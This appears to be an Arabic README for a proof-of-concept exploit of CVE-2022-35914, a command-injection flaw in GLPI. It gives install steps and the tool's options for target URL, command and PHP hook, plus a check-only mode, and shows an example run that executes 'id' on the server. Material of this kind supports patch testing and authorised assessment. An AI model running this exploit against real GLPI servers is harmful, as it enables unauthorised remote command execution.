
إثبات المفهوم للاستغلال لـ CVE-2022-35914، ثغرة حقن أوامر في GLPI عبر سكريبت مكتبة طرف ثالث. ينفذ أوامر عشوائية على نسخ GLPI الضعيفة.
pip install -r requirements.txt
./CVE-2022-35914.py -h
الاستخدام: CVE-2022-35914.py [-h] -u URL -c CMD [-f HOOK] [--check] [--user-agent USER_AGENT]
CVE-2022-35914 - GLPI - حقن الأوامر باستخدام سكربت مكتبة طرف ثالث
الخيارات:
-h, --help عرض رسالة المساعدة والخروج
-u URL الرابط المراد اختباره
-c CMD الأمر المراد تنفيذه
-f HOOK دالة الخطاف PHP (الافتراضي: exec)
--check الفحص فقط، بدون تنفيذ أوامر.
--user-agent USER_AGENT
وكيل المستخدم المخصص
مثال:
❯ ./CVE-2022-35914.py -u http://glpi
[+] مخرجات الأمر (رمز الإرجاع: 0):
uid=48(apache) gid=48(apache) groups=48(apache)